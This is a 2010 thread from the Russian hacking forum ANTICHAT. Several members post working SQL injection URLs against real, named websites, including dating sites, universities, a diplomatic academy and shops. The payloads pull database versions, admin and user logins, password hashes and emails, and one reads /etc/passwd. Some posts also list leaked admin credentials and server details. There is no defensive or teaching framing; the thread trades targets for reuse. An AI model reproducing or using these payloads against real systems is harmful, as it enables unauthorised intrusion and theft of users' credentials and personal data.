HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.10.2010, 16:46
Bo0oM
Новичок
Регистрация: 26.12.2009
Сообщений: 4
Провел на форуме:
76437

Репутация: 5
Отправить сообщение для Bo0oM с помощью ICQ
По умолчанию

Датинг?!

http://www.adultfyi.com/read.php?ID=999999+union+select+1,concat_ws(0x3a,v ersion(),user()%20,database(),@@version_compile_os ),3,4,5,6,7,8--

http://www.siberianbrides.com/show_anketa_lady.php?id=99999+union+select+concat_ ws(0x3a,version(),user()%20,database(),@@version_c ompile_os),2,3,4,5,6,7--
 
Ответить с цитированием

  #2  
Старый 17.10.2010, 17:18
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

http://www.capitansilver.ru/?id=-4+union+select+1,2,concat_ws(0x3a,version(),user() ,database(),@@version_compile_os),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19+--

4.0.27-log silver2@zvm13.host.ru silver2 pc-linux-gnu

http://www.capitansilver.ru/?id=-4+union+select+1,2,concat_ws(0x3a,login,password), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+use r+limit+0,1--
 
Ответить с цитированием

  #3  
Старый 17.10.2010, 17:22
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

http://www.greennavigation.com/news/news_profile.php?id=-33+union+select+0,1,2,3,concat(username,0x3a,p ass word),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from +login

PR 4

http://www.jitreshippables.com/news1.php?id=-5+union+select+1,concat(username,0x3a,p ass word,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+j os_users

PR 3

http://www.hopeevanmin.org/calendar/eventdisplay.php?id=-13%20union%20select%201,2,concat(username,0x3a,p ass word)%20from%20admin

PR 2

http://www.adoradoll.us/news_detail.php?ID=44+union+select+0,concat(UserNa me,0x3a,P ass Word),2,3,4,5,6,7,8,9,10,11+from+DownUser

PR 3

http://mycjonline.com/articlesdetails.php?id=-21%20%20union%20select%20concat(username,0x3a,p ass word),2,3%20from%20users

PR 3

http://www.lapine-fsbo.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,concat(usernam e,0x3a,p ass word),1,1,1,1,1,1,2,2,2,2,2/**/from/*%20*/admin--

PR 2

http://nekar.gr/index.php?id=-1%20union%20select%200,concat(username,0x3a,p ass word,0x3a,email),2,0x65786569207369676f75726120736 f6261726f2070726f626c686d6120682053514c20746f75207 369746521,4,5,6,7,8,9,10,11%20from%20admins--

PR 4

http://www.discoveryland.cn/index.php?c=article&a=view&artid=104%20and%201=2%2 0union%20all%20select%201,2,3,concat(username,0x3a ,password),5,6,7,8,9,10%20from%20dland_admin%20lim it%200,1--

PR 5

http://www.citme.com.cn/news.php?id=-57+union+select+0,concat_ws(username,0x3a,password ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26+from+Tb_Admin

PR 5 Cy 10

http://toeic-vietnam.com/info/details.php?id=null%20union%20select%201,2,group_c oncat(username,0x3a,password),4,5,6,7%20from%20use rs

PR 4

http://www.futurape.com/vedi-news.php?id=7+AND+1=2+UNION+SELECT+1,2,group_conca t(Username,0x3a,Password),4,5,6,7,8,9+FROM+Utente

PR 3

http://www.shangproperties.com/news_archive.php?id=-6%20union%20select%201,%202,%203,%204,%205,6,%207, group_concat(Username,0x3a,Password),%209,%2010,%2 011,%2012,%2013,%2014+from+auth_user_md5--

PR 3

http://www.hiast.edu.vn/index.php?pg=tintuc&task=chitiet&p2=52&p3=-129+Union+Select+1,2,3,group_concat(username,0x3a, password,0x3a),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8+from+bee_admin--&lang=en

PR 3

http://www.radarmadiun.co.id/main.php?act=detail&catid=24&id=-335+UNION+ALL+SELECT+1,2,3,4,5,group_concat(userna me,0x3a,password,0x3a,name,0x3a,email,0x3a,phone,0 x3a,status,0x3a,createdby,0x3a,created,0x3a,update d,0x3a,lastlogin),7,8,9+from+cms_users+--

PR 3

http://www.smkn2bukittinggi.com/detail.php?id=-3%20union%20select%201,group_concat(username,0x3a, password),3,4,5,6,7,8,9,10,11,12%20from%20user

PR 4

http://nkutr.nku.edu.tr/haberdetay.php?id=-1111'UNioN%20SeLeCt%201,GRouP_ConCaT(username,0x3a ,password,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1%20from%20mmyo_users--+

PR 7 Cy 10

http://www.coursupreme.dz/index.php?p=affichedecision&id=-669%20union%20select%201,2,3,4,5,6,load_file('/etc/passwd'),8+from+mysql.user

Наглядный пример читалки файлов через скулю

PR 5
 
Ответить с цитированием

  #4  
Старый 17.10.2010, 18:01
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

http://eyeworld.mobi/current-issue-article.php?id=5621%20and%20substring(version(),1, 1)=3

3-я ветка =\

http://www.cadtutor.mobi/links/includes/jump.php?id=2%20and%20ascii(lower(substring((selec t version()),1,1)))>1
 
Ответить с цитированием

  #5  
Старый 17.10.2010, 22:18
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

http://www.ulbsibiu.ro/ro/stiri/news.php?print=true&news_id=-999.9%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, (SELECT%20concat(0x7e,0x27,Hex(cast(jos_users.pass word%20as%20char)),0x27,0x7e)%20FROM%20cat_sociolo gie.jos_users%20LIMIT%200,1)%20,28,29,30,31,32,33, 34,35,36,37,38--

PR 8 Cy 30
 
Ответить с цитированием

  #6  
Старый 17.10.2010, 22:40
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

Diplomatic Academy of Vienna(Вена)

Код:
Code:
http://www.da-vienna.at/jart/prj3/diplomatische_akademie/main.jart?rel=en&reserve-mode=active&content-id=1268305958599&artikel_id=-4283+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,0x3a,0x3a,username,0x3a,0x3a,password,0x3a,0x3a,anrede,0x3a,0x3a,realvname,0x3a,0x3a,realnname,0x3a,0x3a,land,0x3a,0x3a,ort,0x3a,0x3a,plz,0x3a,0x3a,strasse,0x3a,0x3a,email,0x3a,0x3a,gebdat,0x3a,0x3a,0x3a),11,12,13,14,15,16,17+from+diplak.wuser_user--
PR — 7
 
Ответить с цитированием

  #7  
Старый 17.10.2010, 22:46
-PRIVAT-
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917

Репутация: 17
По умолчанию

Цитата:
Сообщение от None  
http://www.conbhaireangsd.co.uk/dogpage.php?dog_ID=-17/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,user_ID,username,password ),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20FROM%2 0user--


Цитата:
Сообщение от None  
http://www.dialynne.co.uk/dogpage.php?dog_ID=-17/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,user_ID,username,password ),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20FROM%2 0user--


Цитата:
Сообщение от None  
http://www.flamuna.co.uk/dogpage.php?dog_ID=-17/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,user_ID,username,password ),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20FROM%2 0user--




Цитата:
Сообщение от None  
http://www.stormavon.co.uk/dogpage.php?dog_ID=-17/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,user_ID,username,password ),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20FROM%2 0user--


Цитата:
Сообщение от None  
http://www.diptonia.co.uk/dogpage.php?dog_ID=-17/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,user_ID,username,password ),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20FROM%2 0user--


Цитата:
Сообщение от None  
http://www.asc-hq.org/asc/comm_details.php?gamer_id=-1287%20union%20select%201,2,3,4,5,6,7,group_concat %28column_name%29,9,0,1,2,3,4,5,6%20from%20informa tion_schema.columns%20where%20table_name=0x74696b6 95f7573657273--


Цитата:
Сообщение от None  
http://www.baryakina.com/?razdel=lang&ln=-2%20union%20select%201,2,3--


Цитата:
Сообщение от None  
http://www.anunt.md/rus/telecom/anunturi/mobile_view.php?id=1507%20union%20select%201,2,3,4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,version(),4,5 ,6,7,8,9,0,1,2,3--


Цитата:
Сообщение от None  
http://baltictravelnews.com/modules/printer_view/print_view.php?pub_id=-58160%20union%20select%201,concat%28@i:=0x00,@o:=0 x0d0a,benchmark%28225,@o:=CONCAT%28@o,0x0d0a,%28SE LECT%20concat%28table_schema,0x2E,@i:=table_name%2 9%20FROM%20information_schema.tables%20WHERE%20tab le_name%3E@i%20order%20by%20table_name%20LIMIT%201 %29%29%29,@o%29,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9, 0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4, 5,6,7,8,9,0,1,2,3,4,5,6,7&l=ee


Цитата:
Сообщение от None  
http://www.nomachine.com/news-read.php?idnews=284-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16--


Цитата:
Сообщение от None  
http://u-books.ru/index.php?book_id=8353-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18--


Цитата:
Сообщение от None  
http://europeanleague.ru/news.php?id=79-999.99%20union%20select%201,2,3,4,5,6,7,8,9,10--


Цитата:
Сообщение от None  
http://jobs.genomecenter.ucdavis.edu/start_app.php?job_id=78 union select 1,2--


Цитата:
Сообщение от None  
http://www.pro-estate.ru/showalla.html?agent_id=-58057%20or%201%20group%20by%20concat(version(),flo or(rand(0)*2))having%20min(0)%20or%201--%201
Вывод в Title


Цитата:
Сообщение от None  
http://www.caiv.org/noticias.php?apartado=israel&mire_id=278%20or%201% 20group%20by%20concat((select/**/regi_Password%20from%20registros%20limit%200,1),fl oor(rand(0)*2))having%20min(0)%20or%201--%201&seccion=Noticias%20de%20Israel
 
Ответить с цитированием

  #8  
Старый 18.10.2010, 00:55
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.use.or.ug/copindex.php?cat=lstofallco&subcat=lstcodir&cop=84 +and+1=0+union+select+1,2,3,version(),5,6,7,8,9,10 ,11,12,13,14,15,16,17--

http://www.umi.ac.ug/courses2.php?course_id=73+or+1+group+by+concat((se lect+version()+from+information_schema.tables+limi t+0,1),floor(rand(0)*2))having+min(0)+or+1--
 
Ответить с цитированием

  #9  
Старый 18.10.2010, 05:43
[Dark Green]
Новичок
Регистрация: 13.05.2010
Сообщений: 11
Провел на форуме:
118828

Репутация: 13
По умолчанию

У меня дебют в данной теме Надеюсь буду хоть кому то полезен

filmworld.com.ua

admin:filmworldadmin

PR: 0 ТИЦ: 0

Database Version: 5.0.91-community-log

Database name: filmworl_film

User name: filmworl@localhost

OC type: unknown-linux-gnu​

Код:
Code:
http://filmworld.com.ua/index.php?shop=yes&razd=%C2%EE%E5%ED%ED%FB%E5%20(mpeg)&rubr=%D4%E8%EB%FC%EC%FB%20(mpeg)&id=1030+and+1=0+union+select+unhex(hex(version()))--
Код:
Code:
http://filmworld.com.ua/index.php?shop=yes&razd=%C2%EE%E5%ED%ED%FB%E5%20(mpeg)&rubr=%D4%E8%EB%FC%EC%FB%20(mpeg)&id=1030+and+1=0+union+select+login+from+customer+limit+0,1--
Код:
Code:
http://filmworld.com.ua/index.php?shop=yes&razd=%C2%EE%E5%ED%ED%FB%E5%20(mpeg)&rubr=%D4%E8%EB%FC%EC%FB%20(mpeg)&id=1030+and+1=0+union+select+password+from+customer+limit+0,1--
vmo.rgub.ru

PR: 6 ТИЦ: 60

Database Version: 5.1.37-1ubuntu5.4

Database name: vmo_db01

User name: root@localhost

OC type: debian-linux-gnu

FILE_PRIV: Y

Magic quotes = off​

Код:
Code:
http://vmo.rgub.ru/policy/article.php?id=214+and+1=0+union+select+1,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12--
Код:
Code:
http://vmo.rgub.ru/policy/article.php?id=214+and+1=0+union+select+1,login,3,4,5,6,password,8,9,10,11,12+from+users+limit+0,1--
mirpodarkov.in.ua

PR: 2 ТИЦ: 0

Database Version: 5.0.91

Database name: wildcat_mir

User name: wildcat@localhost

OC type: redhat-linux-gnu ​

Код:
Code:
http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(version())),11--
Код:
Code:
http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,user_group,11+from+dle_users+limit+0,1--
Код:
Code:
http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,password,11+from+dle_users+limit+0,1--
Код:
Code:
http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,username,11+from+dle_users+limit+0,1--
Код:
Code:
http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,email,11+from+dle_users+limit+0,1--
Код:
Code:
http://mirpodarkov.in.ua/admin.php
 
Ответить с цитированием

  #10  
Старый 18.10.2010, 15:15
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

http://www.oxothik.ru/index.php?action=news&id=-99+union+all+select+1,concat_ws(0x3a,@@version,use r(),database(),@@version_compile_os),3,4,5,6,7--

5.0.26-lk-log ecliptru_tour@localhost ecliptru_tour pc-linux-gnu
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ